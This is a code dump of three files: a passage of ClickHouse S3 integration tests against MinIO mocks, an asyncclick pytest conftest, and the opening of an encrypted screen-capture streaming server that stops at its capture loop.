def test_get_path_with_special(started_cluster, special):
symbol = {"space": "%20", "plus": "%2B", "plus2": "%2B"}[special]
safe_symbol = {"space": "%20", "plus": "+", "plus2": "%2B"}[special]
auth = "'minio','minio123',"
table_format = "column1 String"
instance = started_cluster.instances["dummy"]
get_query = f"SELECT * FROM s3('http://resolver:8082/get-my-path/{safe_symbol}.csv', {auth}'CSV', '{table_format}') FORMAT TSV"
assert run_query(instance, get_query).splitlines() == [f"/{symbol}.csv"]
# Test put no data to S3.
@pytest.mark.parametrize("auth", [
pytest.param("'minio','minio123',", id="minio")
])
def test_empty_put(started_cluster, auth):
# type: (ClickHouseCluster, str) -> None
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
drop_empty_table_query = "DROP TABLE IF EXISTS empty_table"
create_empty_table_query = """
CREATE TABLE empty_table (
{}
) ENGINE = Null()
""".format(table_format)
run_query(instance, drop_empty_table_query)
run_query(instance, create_empty_table_query)
filename = "empty_put_test.csv"
put_query = "insert into table function s3('http://{}:{}/{}/{}', {}'CSV', '{}') select * from empty_table".format(
started_cluster.minio_ip, MINIO_INTERNAL_PORT, bucket, filename, auth, table_format)
run_query(instance, put_query)
try:
run_query(instance, "select count(*) from s3('http://{}:{}/{}/{}', {}'CSV', '{}')".format(
started_cluster.minio_ip, MINIO_INTERNAL_PORT, bucket, filename, auth, table_format))
assert False, "Query should be failed."
except helpers.client.QueryRuntimeException as e:
assert str(e).find("The specified key does not exist") != 0
# Test put values in CSV format.
@pytest.mark.parametrize("maybe_auth,positive", [
pytest.param("", True, id="positive"),
pytest.param("'minio','minio123',", True, id="auth_positive"),
pytest.param("'wrongid','wrongkey',", False, id="negative"),
])
def test_put_csv(started_cluster, maybe_auth, positive):
# type: (ClickHouseCluster, bool, str) -> None
bucket = started_cluster.minio_bucket if not maybe_auth else started_cluster.minio_restricted_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
filename = "test.csv"
put_query = "insert into table function s3('http://{}:{}/{}/{}', {}'CSV', '{}') format CSV settings s3_truncate_on_insert=1".format(
started_cluster.minio_ip, MINIO_INTERNAL_PORT, bucket, filename, maybe_auth, table_format)
csv_data = "8,9,16\n11,18,13\n22,14,2\n"
try:
run_query(instance, put_query, stdin=csv_data)
except helpers.client.QueryRuntimeException:
if positive:
raise
else:
assert positive
assert csv_data == get_s3_file_content(started_cluster, bucket, filename)
# Test put and get with S3 server redirect.
def test_put_get_with_redirect(started_cluster):
# type: (ClickHouseCluster) -> None
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
values = "(1, 1, 1), (1, 1, 1), (11, 11, 11)"
values_csv = "1,1,1\n1,1,1\n11,11,11\n"
filename = "test.csv"
query = "insert into table function s3('http://{}:{}/{}/{}', 'CSV', '{}') values settings s3_truncate_on_insert=1 {}".format(
started_cluster.minio_redirect_host, started_cluster.minio_redirect_port, bucket, filename, table_format, values)
run_query(instance, query)
assert values_csv == get_s3_file_content(started_cluster, bucket, filename)
query = "select *, column1*column2*column3 from s3('http://{}:{}/{}/{}', 'CSV', '{}')".format(
started_cluster.minio_redirect_host, started_cluster.minio_redirect_port, bucket, filename, table_format)
stdout = run_query(instance, query)
assert list(map(str.split, stdout.splitlines())) == [
["1", "1", "1", "1"],
["1", "1", "1", "1"],
["11", "11", "11", "1331"],
]
# Test put with restricted S3 server redirect.
def test_put_with_zero_redirect(started_cluster):
# type: (ClickHouseCluster) -> None
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["s3_max_redirects"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
values = "(1, 1, 1), (1, 1, 1), (11, 11, 11)"
filename = "test.csv"
# Should work without redirect
query = "insert into table function s3('http://{}:{}/{}/{}', 'CSV', '{}') values settings s3_truncate_on_insert=1 {}".format(
started_cluster.minio_ip, MINIO_INTERNAL_PORT, bucket, filename, table_format, values)
run_query(instance, query)
# Should not work with redirect
query = "insert into table function s3('http://{}:{}/{}/{}', 'CSV', '{}') values settings s3_truncate_on_insert=1 {}".format(
started_cluster.minio_redirect_host, started_cluster.minio_redirect_port, bucket, filename, table_format, values)
exception_raised = False
try:
run_query(instance, query)
except Exception as e:
assert str(e).find("Too many redirects while trying to access") != -1
exception_raised = True
finally:
assert exception_raised
def test_put_get_with_globs(started_cluster):
# type: (ClickHouseCluster) -> None
unique_prefix = random.randint(1,10000)
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
max_path = ""
for i in range(10):
for j in range(10):
path = "{}/{}_{}/{}.csv".format(unique_prefix, i, random.choice(['a', 'b', 'c', 'd']), j)
max_path = max(path, max_path)
values = "({},{},{})".format(i, j, i + j)
query = "insert into table function s3('http://{}:{}/{}/{}', 'CSV', '{}') values {}".format(
started_cluster.minio_ip, MINIO_INTERNAL_PORT, bucket, path, table_format, values)
run_query(instance, query)
query = "select sum(column1), sum(column2), sum(column3), min(_file), max(_path) from s3('http://{}:{}/{}/{}/*_{{a,b,c,d}}/%3f.csv', 'CSV', '{}')".format(
started_cluster.minio_redirect_host, started_cluster.minio_redirect_port, bucket, unique_prefix, table_format)
assert run_query(instance, query).splitlines() == [
"450\t450\t900\t0.csv\t{bucket}/{max_path}".format(bucket=bucket, max_path=max_path)]
minio = started_cluster.minio_client
for obj in list(minio.list_objects(started_cluster.minio_bucket, prefix='{}/'.format(unique_prefix), recursive=True)):
minio.remove_object(started_cluster.minio_bucket, obj.object_name)
# Test multipart put.
@pytest.mark.parametrize("maybe_auth,positive", [
pytest.param("", True, id="positive"),
pytest.param("'wrongid','wrongkey'", False, id="negative"),
# ("'minio','minio123',",True), Redirect with credentials not working with nginx.
])
def test_multipart_put(started_cluster, maybe_auth, positive):
# type: (ClickHouseCluster) -> None
bucket = started_cluster.minio_bucket if not maybe_auth else started_cluster.minio_restricted_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
# Minimum size of part is 5 Mb for Minio.
# See: https://github.com/minio/minio/blob/master/docs/minio-limits.md
min_part_size_bytes = 5 * 1024 * 1024
csv_size_bytes = int(min_part_size_bytes * 1.5) # To have 2 parts.
one_line_length = 6 # 3 digits, 2 commas, 1 line separator.
# Generate data having size more than one part
int_data = [[1, 2, 3] for i in range(csv_size_bytes // one_line_length)]
csv_data = "".join(["{},{},{}\n".format(x, y, z) for x, y, z in int_data])
assert len(csv_data) > min_part_size_bytes
filename = "test_multipart.csv"
put_query = "insert into table function s3('http://{}:{}/{}/{}', {}'CSV', '{}') format CSV".format(
started_cluster.minio_redirect_host, started_cluster.minio_redirect_port, bucket, filename, maybe_auth, table_format)
try:
run_query(instance, put_query, stdin=csv_data, settings={'s3_min_upload_part_size': min_part_size_bytes,
's3_max_single_part_upload_size': 0})
except helpers.client.QueryRuntimeException:
if positive:
raise
else:
assert positive
# Use proxy access logs to count number of parts uploaded to Minio.
proxy_logs = started_cluster.get_container_logs("proxy1") # type: str
assert proxy_logs.count("PUT /{}/{}".format(bucket, filename)) >= 2
assert csv_data == get_s3_file_content(started_cluster, bucket, filename)
def test_remote_host_filter(started_cluster):
instance = started_cluster.instances["restricted_dummy"]
format = "column1 UInt32, column2 UInt32, column3 UInt32"
query = "select *, column1*column2*column3 from s3('http://{}:{}/{}/test.csv', 'CSV', '{}')".format(
"invalid_host", MINIO_INTERNAL_PORT, started_cluster.minio_bucket, format)
assert "not allowed in configuration file" in instance.query_and_get_error(query)
other_values = "(1, 1, 1), (1, 1, 1), (11, 11, 11)"
query = "insert into table function s3('http://{}:{}/{}/test.csv', 'CSV', '{}') values {}".format(
"invalid_host", MINIO_INTERNAL_PORT, started_cluster.minio_bucket, format, other_values)
assert "not allowed in configuration file" in instance.query_and_get_error(query)
def test_wrong_s3_syntax(started_cluster):
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
expected_err_msg = "Code: 42" # NUMBER_OF_ARGUMENTS_DOESNT_MATCH
query = "create table test_table_s3_syntax (id UInt32) ENGINE = S3('', '', '', '', '', '')"
assert expected_err_msg in instance.query_and_get_error(query)
expected_err_msg = "Code: 36" # BAD_ARGUMENTS
query = "create table test_table_s3_syntax (id UInt32) ENGINE = S3('')"
assert expected_err_msg in instance.query_and_get_error(query)
# https://en.wikipedia.org/wiki/One_Thousand_and_One_Nights
def test_s3_glob_scheherazade(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
max_path = ""
values = "(1, 1, 1)"
nights_per_job = 1001 // 30
jobs = []
for night in range(0, 1001, nights_per_job):
def add_tales(start, end):
for i in range(start, end):
path = "night_{}/tale.csv".format(i)
query = "insert into table function s3('http://{}:{}/{}/{}', 'CSV', '{}') values {}".format(
started_cluster.minio_ip, MINIO_INTERNAL_PORT, bucket, path, table_format, values)
run_query(instance, query)
jobs.append(threading.Thread(target=add_tales, args=(night, min(night + nights_per_job, 1001))))
jobs[-1].start()
for job in jobs:
job.join()
query = "select count(), sum(column1), sum(column2), sum(column3) from s3('http://{}:{}/{}/night_*/tale.csv', 'CSV', '{}')".format(
started_cluster.minio_redirect_host, started_cluster.minio_redirect_port, bucket, table_format)
assert run_query(instance, query).splitlines() == ["1001\t1001\t1001\t1001"]
def run_s3_mocks(started_cluster):
logging.info("Starting s3 mocks")
mocks = (
("mock_s3.py", "resolver", "8080"),
("unstable_server.py", "resolver", "8081"),
("echo.py", "resolver", "8082"),
)
for mock_filename, container, port in mocks:
container_id = started_cluster.get_container_id(container)
current_dir = os.path.dirname(__file__)
started_cluster.copy_file_to_container(container_id, os.path.join(current_dir, "s3_mocks", mock_filename), mock_filename)
started_cluster.exec_in_container(container_id, ["python", mock_filename, port], detach=True)
# Wait for S3 mocks to start
for mock_filename, container, port in mocks:
num_attempts = 100
for attempt in range(num_attempts):
ping_response = started_cluster.exec_in_container(started_cluster.get_container_id(container),
["curl", "-s", f"http://localhost:{port}/"], nothrow=True)
if ping_response != 'OK':
if attempt == num_attempts - 1:
assert ping_response == 'OK', 'Expected "OK", but got "{}"'.format(ping_response)
else:
time.sleep(1)
else:
logging.debug(f"mock {mock_filename} ({port}) answered {ping_response} on attempt {attempt}")
break
logging.info("S3 mocks started")
def replace_config(old, new):
config = open(CONFIG_PATH, 'r')
config_lines = config.readlines()
config.close()
config_lines = [line.replace(old, new) for line in config_lines]
config = open(CONFIG_PATH, 'w')
config.writelines(config_lines)
config.close()
def test_custom_auth_headers(started_cluster):
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
filename = "test.csv"
get_query = "select * from s3('http://resolver:8080/{bucket}/{file}', 'CSV', '{table_format}')".format(
bucket=started_cluster.minio_restricted_bucket,
file=filename,
table_format=table_format)
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
result = run_query(instance, get_query)
assert result == '1\t2\t3\n'
instance.query("DROP TABLE IF EXISTS test")
instance.query(
"CREATE TABLE test ({table_format}) ENGINE = S3('http://resolver:8080/{bucket}/{file}', 'CSV')".format(
bucket=started_cluster.minio_restricted_bucket,
file=filename,
table_format=table_format
))
assert run_query(instance, "SELECT * FROM test") == '1\t2\t3\n'
replace_config("<header>Authorization: Bearer TOKEN", "<header>Authorization: Bearer INVALID_TOKEN")
instance.query("SYSTEM RELOAD CONFIG")
ret, err = instance.query_and_get_answer_with_error("SELECT * FROM test")
assert ret == "" and err != ""
replace_config("<header>Authorization: Bearer INVALID_TOKEN", "<header>Authorization: Bearer TOKEN")
instance.query("SYSTEM RELOAD CONFIG")
assert run_query(instance, "SELECT * FROM test") == '1\t2\t3\n'
instance.query("DROP TABLE test")
def test_custom_auth_headers_exclusion(started_cluster):
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
filename = "test.csv"
get_query = f"SELECT * FROM s3('http://resolver:8080/{started_cluster.minio_restricted_bucket}/restricteddirectory/{filename}', 'CSV', '{table_format}')"
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
with pytest.raises(helpers.client.QueryRuntimeException) as ei:
result = run_query(instance, get_query)
print(result)
assert ei.value.returncode == 243
assert 'Forbidden Error' in ei.value.stderr
def test_infinite_redirect(started_cluster):
bucket = "redirected"
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
filename = "test.csv"
get_query = f"select * from s3('http://resolver:{started_cluster.minio_redirect_port}/{bucket}/{filename}', 'CSV', '{table_format}')"
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
exception_raised = False
try:
run_query(instance, get_query)
except Exception as e:
assert str(e).find("Too many redirects while trying to access") != -1
exception_raised = True
finally:
assert exception_raised
@pytest.mark.parametrize("extension,method", [
pytest.param("bin", "gzip", id="bin"),
pytest.param("gz", "auto", id="gz"),
])
def test_storage_s3_get_gzip(started_cluster, extension, method):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"]
filename = f"test_get_gzip.{extension}"
name = f"test_get_gzip_{extension}"
data = [
"Sophia Intrieri,55",
"Jack Taylor,71",
"Christopher Silva,66",
"Clifton Purser,35",
"Richard Aceuedo,43",
"Lisa Hensley,31",
"Alice Wehrley,1",
"Mary Farmer,47",
"Samara Ramirez,19",
"Shirley Lloyd,51",
"Santos Cowger,0",
"Richard Mundt,88",
"Jerry Gonzalez,15",
"Angela James,10",
"Norman Ortega,33",
""
]
run_query(instance, f"DROP TABLE IF EXISTS {name}")
buf = io.BytesIO()
compressed = gzip.GzipFile(fileobj=buf, mode="wb")
compressed.write(("\n".join(data)).encode())
compressed.close()
put_s3_file_content(started_cluster, bucket, filename, buf.getvalue())
run_query(instance, f"""CREATE TABLE {name} (name String, id UInt32) ENGINE = S3(
'http://{started_cluster.minio_ip}:{MINIO_INTERNAL_PORT}/{bucket}/{filename}',
'CSV',
'{method}')""")
run_query(instance, f"SELECT sum(id) FROM {name}").splitlines() == ["565"]
run_query(instance, f"DROP TABLE {name}")
def test_storage_s3_get_unstable(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"]
table_format = "column1 Int64, column2 Int64, column3 Int64, column4 Int64"
get_query = f"SELECT count(), sum(column3), sum(column4) FROM s3('http://resolver:8081/{started_cluster.minio_bucket}/test.csv', 'CSV', '{table_format}') FORMAT CSV"
result = run_query(instance, get_query)
assert result.splitlines() == ["500001,500000,0"]
def test_storage_s3_put_uncompressed(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"]
filename = "test_put_uncompressed.bin"
name = "test_put_uncompressed"
data = [
"'Gloria Thompson',99",
"'Matthew Tang',98",
"'Patsy Anderson',23",
"'Nancy Badillo',93",
"'Roy Hunt',5",
"'Adam Kirk',51",
"'Joshua Douds',28",
"'Jolene Ryan',0",
"'Roxanne Padilla',50",
"'Howard Roberts',41",
"'Ricardo Broughton',13",
"'Roland Speer',83",
"'Cathy Cohan',58",
"'Kathie Dawson',100",
"'Gregg Mcquistion',11",
]
run_query(instance, "CREATE TABLE {} (name String, id UInt32) ENGINE = S3('http://{}:{}/{}/{}', 'CSV')".format(
name, started_cluster.minio_ip, MINIO_INTERNAL_PORT, bucket, filename))
run_query(instance, "INSERT INTO {} VALUES ({})".format(name, "),(".join(data)))
run_query(instance, "SELECT sum(id) FROM {}".format(name)).splitlines() == ["753"]
uncompressed_content = get_s3_file_content(started_cluster, bucket, filename)
assert sum([ int(i.split(',')[1]) for i in uncompressed_content.splitlines() ]) == 753
@pytest.mark.parametrize("extension,method", [
pytest.param("bin", "gzip", id="bin"),
pytest.param("gz", "auto", id="gz")
])
def test_storage_s3_put_gzip(started_cluster, extension, method):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"]
filename = f"test_put_gzip.{extension}"
name = f"test_put_gzip_{extension}"
data = [
"'Joseph Tomlinson',5",
"'Earnest Essary',44",
"'Matha Pannell',24",
"'Michael Shavers',46",
"'Elias Groce',38",
"'Pamela Bramlet',50",
"'Lewis Harrell',49",
"'Tamara Fyall',58",
"'George Dixon',38",
"'Alice Walls',49",
"'Paula Mais',24",
"'Myrtle Pelt',93",
"'Sylvia Naffziger',18",
"'Amanda Cave',83",
"'Yolanda Joseph',89"
]
run_query(instance, f"""CREATE TABLE {name} (name String, id UInt32) ENGINE = S3(
'http://{started_cluster.minio_ip}:{MINIO_INTERNAL_PORT}/{bucket}/{filename}',
'CSV',
'{method}')""")
run_query(instance, f"INSERT INTO {name} VALUES ({'),('.join(data)})")
run_query(instance, f"SELECT sum(id) FROM {name}").splitlines() == ["708"]
buf = io.BytesIO(get_s3_file_content(started_cluster, bucket, filename, decode=False))
f = gzip.GzipFile(fileobj=buf, mode="rb")
uncompressed_content = f.read().decode()
assert sum([ int(i.split(',')[1]) for i in uncompressed_content.splitlines() ]) == 708
def test_truncate_table(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
name = "truncate"
instance.query("CREATE TABLE {} (id UInt32) ENGINE = S3('http://{}:{}/{}/{}', 'CSV')".format(
name, started_cluster.minio_ip, MINIO_INTERNAL_PORT, bucket, name))
instance.query("INSERT INTO {} SELECT number FROM numbers(10)".format(name))
result = instance.query("SELECT * FROM {}".format(name))
assert result == instance.query("SELECT number FROM numbers(10)")
instance.query("TRUNCATE TABLE {}".format(name))
minio = started_cluster.minio_client
timeout = 30
while timeout > 0:
if len(list(minio.list_objects(started_cluster.minio_bucket, 'truncate/'))) == 0:
return
timeout -= 1
time.sleep(1)
assert(len(list(minio.list_objects(started_cluster.minio_bucket, 'truncate/'))) == 0)
assert instance.query("SELECT * FROM {}".format(name)) == ""
def test_predefined_connection_configuration(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
name = "test_table"
instance.query("drop table if exists {}".format(name))
instance.query("CREATE TABLE {} (id UInt32) ENGINE = S3(s3_conf1, format='CSV')".format(name))
instance.query("INSERT INTO {} SELECT number FROM numbers(10)".format(name))
result = instance.query("SELECT * FROM {}".format(name))
assert result == instance.query("SELECT number FROM numbers(10)")
result = instance.query("SELECT * FROM s3(s3_conf1, format='CSV', structure='id UInt32')")
assert result == instance.query("SELECT number FROM numbers(10)")
result = ""
def test_url_reconnect_in_the_middle(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"]
table_format = "id String, data String"
filename = "test_url_reconnect_{}.tsv".format(random.randint(0, 1000))
instance.query(f"""insert into table function
s3('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/{filename}', 'TSV', '{table_format}')
select number, randomPrintableASCII(number % 1000) from numbers(1000000)""")
with PartitionManager() as pm:
pm_rule_reject = {'probability': 0.02, 'destination': instance.ip_address, 'source_port': started_cluster.minio_port, 'action': 'REJECT --reject-with tcp-reset'}
pm_rule_drop_all = {'destination': instance.ip_address, 'source_port': started_cluster.minio_port, 'action': 'DROP'}
pm._add_rule(pm_rule_reject)
def select():
global result
result = instance.query(
f"""select sum(cityHash64(x)) from (select toUInt64(id) + sleep(0.1) as x from
url('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/{filename}', 'TSV', '{table_format}')
settings http_max_tries = 10, http_retry_max_backoff_ms=2000, http_send_timeout=1, http_receive_timeout=1)""")
assert(int(result) == 3914219105369203805)
thread = threading.Thread(target=select)
thread.start()
time.sleep(4)
pm._add_rule(pm_rule_drop_all)
time.sleep(2)
pm._delete_rule(pm_rule_drop_all)
pm._delete_rule(pm_rule_reject)
thread.join()
assert(int(result) == 3914219105369203805)
def test_seekable_formats(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
table_function = f"s3(s3_parquet, structure='a Int32, b String', format='Parquet')"
instance.query(f"insert into table function {table_function} SELECT number, randomString(100) FROM numbers(5000000) settings s3_truncate_on_insert=1")
result = instance.query(f"SELECT count() FROM {table_function}")
assert(int(result) == 5000000)
table_function = f"s3(s3_orc, structure='a Int32, b String', format='ORC')"
exec_query_with_retry(instance, f"insert into table function {table_function} SELECT number, randomString(100) FROM numbers(5000000) settings s3_truncate_on_insert=1")
result = instance.query(f"SELECT count() FROM {table_function}")
assert(int(result) == 5000000)
instance.query("SYSTEM FLUSH LOGS")
result = instance.query(f"SELECT formatReadableSize(memory_usage) FROM system.query_log WHERE startsWith(query, 'SELECT count() FROM s3') AND memory_usage > 0 ORDER BY event_time desc")
print(result[:3])
assert(int(result[:3]) < 200)
def test_seekable_formats_url(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"]
table_function = f"s3(s3_parquet, structure='a Int32, b String', format='Parquet')"
instance.query(f"insert into table function {table_function} select number, randomString(100) from numbers(5000000) settings s3_truncate_on_insert=1")
table_function = f"url('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/test_parquet', 'Parquet', 'a Int32, b String')"
result = instance.query(f"SELECT count() FROM {table_function}")
assert(int(result) == 5000000)
table_function = f"s3(s3_orc, structure='a Int32, b String', format='ORC')"
exec_query_with_retry(instance, f"insert into table function {table_function} select number, randomString(100) from numbers(5000000) settings s3_truncate_on_insert=1")
table_function = f"url('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/test_orc', 'ORC', 'a Int32, b String')"
result = instance.query(f"SELECT count() FROM {table_function}")
assert(int(result) == 5000000)
instance.query("SYSTEM FLUSH LOGS")
result = instance.query(f"SELECT formatReadableSize(memory_usage) FROM system.query_log WHERE startsWith(query, 'SELECT count() FROM url') AND memory_usage > 0 ORDER BY event_time desc")
print(result[:3])
assert(int(result[:3]) < 200)
def test_empty_file(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"]
name = "empty"
url = f'http://{started_cluster.minio_ip}:{MINIO_INTERNAL_PORT}/{bucket}/{name}'
minio = started_cluster.minio_client
minio.put_object(bucket, name, io.BytesIO(b""), 0)
table_function = f"s3('{url}', 'CSV', 'id Int32')"
result = instance.query(f"SELECT count() FROM {table_function}")
assert(int(result) == 0)
def test_insert_with_path_with_globs(started_cluster):
instance = started_cluster.instances["dummy"]
table_function_3 = f"s3('http://minio1:9001/root/test_parquet*', 'minio', 'minio123', 'Parquet', 'a Int32, b String')"
instance.query_and_get_error(f"insert into table function {table_function_3} SELECT number, randomString(100) FROM numbers(500)")
def test_s3_schema_inference(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"]
instance.query(f"insert into table function s3(s3_native, structure='a Int32, b String', format='Native') select number, randomString(100) from numbers(5000000)")
result = instance.query(f"desc s3(s3_native, format='Native')")
assert result == "a\tInt32\t\t\t\t\t\nb\tString\t\t\t\t\t\n"
result = instance.query(f"select count(*) from s3(s3_native, format='Native')")
assert(int(result) == 5000000)
instance.query(f"create table schema_inference engine=S3(s3_native, format='Native')")
result = instance.query(f"desc schema_inference")
assert result == "a\tInt32\t\t\t\t\t\nb\tString\t\t\t\t\t\n"
result = instance.query(f"select count(*) from schema_inference")
assert(int(result) == 5000000)
table_function = f"url('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/test_native', 'Native')"
result = instance.query(f"desc {table_function}")
assert result == "a\tInt32\t\t\t\t\t\nb\tString\t\t\t\t\t\n"
result = instance.query(f"select count(*) from {table_function}")
assert(int(result) == 5000000)
instance.query(f"create table schema_inference_2 engine=URL('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/test_native', 'Native')")
result = instance.query(f"desc schema_inference_2")
assert result == "a\tInt32\t\t\t\t\t\nb\tString\t\t\t\t\t\n"
result = instance.query(f"select count(*) from schema_inference_2")
assert(int(result) == 5000000)
def test_empty_file(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"]
name = "empty"
url = f'http://{started_cluster.minio_ip}:{MINIO_INTERNAL_PORT}/{bucket}/{name}'
minio = started_cluster.minio_client
minio.put_object(bucket, name, io.BytesIO(b""), 0)
table_function = f"s3('{url}', 'CSV', 'id Int32')"
result = instance.query(f"SELECT count() FROM {table_function}")
assert(int(result) == 0)
def test_overwrite(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"]
table_function = f"s3(s3_parquet, structure='a Int32, b String', format='Parquet')"
instance.query(f"create table test_overwrite as {table_function}")
instance.query(f"truncate table test_overwrite")
instance.query(f"insert into test_overwrite select number, randomString(100) from numbers(50) settings s3_truncate_on_insert=1")
instance.query_and_get_error(f"insert into test_overwrite select number, randomString(100) from numbers(100)")
instance.query(f"insert into test_overwrite select number, randomString(100) from numbers(200) settings s3_truncate_on_insert=1")
result = instance.query(f"select count() from test_overwrite")
assert(int(result) == 200)
def test_create_new_files_on_insert(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"]
table_function = f"s3(s3_parquet, structure='a Int32, b String', format='Parquet')"
instance.query(f"create table test_multiple_inserts as {table_function}")
instance.query(f"truncate table test_multiple_inserts")
instance.query(f"insert into test_multiple_inserts select number, randomString(100) from numbers(10) settings s3_truncate_on_insert=1")
instance.query(f"insert into test_multiple_inserts select number, randomString(100) from numbers(20) settings s3_create_new_file_on_insert=1")
instance.query(f"insert into test_multiple_inserts select number, randomString(100) from numbers(30) settings s3_create_new_file_on_insert=1")
result = instance.query(f"select count() from test_multiple_inserts")
assert(int(result) == 60)
instance.query(f"drop table test_multiple_inserts")
table_function = f"s3(s3_parquet_gz, structure='a Int32, b String', format='Parquet')"
instance.query(f"create table test_multiple_inserts as {table_function}")
instance.query(f"truncate table test_multiple_inserts")
instance.query(f"insert into test_multiple_inserts select number, randomString(100) from numbers(10) settings s3_truncate_on_insert=1")
instance.query(f"insert into test_multiple_inserts select number, randomString(100) from numbers(20) settings s3_create_new_file_on_insert=1")
instance.query(f"insert into test_multiple_inserts select number, randomString(100) from numbers(30) settings s3_create_new_file_on_insert=1")
result = instance.query(f"select count() from test_multiple_inserts")
assert(int(result) == 60)
def test_format_detection(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"]
instance.query(f"create table arrow_table_s3 (x UInt64) engine=S3(s3_arrow)")
instance.query(f"insert into arrow_table_s3 select 1")
result = instance.query(f"select * from s3(s3_arrow)")
assert(int(result) == 1)
result = instance.query(f"select * from url('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/test.arrow')")
assert(int(result) == 1)
|
conftest.py
|
import os
import tempfile
import pytest
import anyio
from functools import partial
from threading import Thread
from asyncclick.testing import CliRunner
class SyncCliRunner(CliRunner):
def invoke(self,*a,_sync=False,**k):
fn = super().invoke
if _sync:
return fn(*a,**k)
# anyio now protects against nested calls, so we use a thread
result = None
def f():
nonlocal result,fn
async def r():
return await fn(*a,**k)
result = anyio.run(r) ## , backend="trio")
t=Thread(target=f, name="TEST")
t.start()
t.join()
return result
@pytest.fixture(scope="function")
def runner(request):
return SyncCliRunner()
def _check_symlinks_supported():
with tempfile.TemporaryDirectory(prefix="click-pytest-") as tempdir:
target = os.path.join(tempdir, "target")
open(target, "w").close()
link = os.path.join(tempdir, "link")
try:
os.symlink(target, link)
return True
except OSError:
return False
symlinks_supported = _check_symlinks_supported()
|
streaming_secured_server.py
|
# Need threading for multiple clients and a way to terminate gracefully
import threading
# Process command line arguments
import argparse
# Stamp the frames with a timestamp
import datetime
# May need for sleep
import time
# Necessary to process images with openCV
import numpy as np
import pyautogui
import imutils
import cv2
from PIL import UnidentifiedImageError, ImageFile
import os
# Needed for network communication
import pickle
import struct
# Needed to handle async calls
import asyncio
# For encryption
from cryptography.hazmat.primitives import hashes, hmac
from cryptography.hazmat.primitives.asymmetric import dh, padding, ec
from cryptography.hazmat.primitives.kdf.hkdf import HKDF
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.serialization import PublicFormat, \
Encoding, load_der_public_key, load_pem_public_key, load_pem_private_key
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
# Needed for logging
import logging
# Needed for exit handling
from contextlib import suppress
# Setting to handle partial frames
ImageFile.LOAD_TRUNCATED_IMAGES = True
# Globals for handling the frames
outputFrame = None
lock = threading.Lock()
# Global to handle streaming loops
stream = True
# Vars for Select
read_list = []
write_list = []
message_queues = {}
dh_keyexchanges = {}
client_derived_keys_ivs = {}
p = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AACAA68FFFFFFFFFFFFFFFF # noqa: E501
g = 2
serialized_RSA_server_public_key = None
RSA_server_private_key = None
disable_ecdh = False
loop = None
restricted = False
trusted_keys_whitelist = {}
# thread that listens for any input, used to terminate stream loop
# def key_capture_thread(server_socket):
# global stream
# input()
# stream = False
# print("starting exit process")
def capture_frames():
global outputFrame, lock, stream, message_queues
main_logger = logging.getLogger("main")
try:
# while not event.is_set():
while stream:
##
# im = Image.open('.screenshot2021-0501_20-10-04-094593.png')
# im.load()
##
# Grab a screenshot
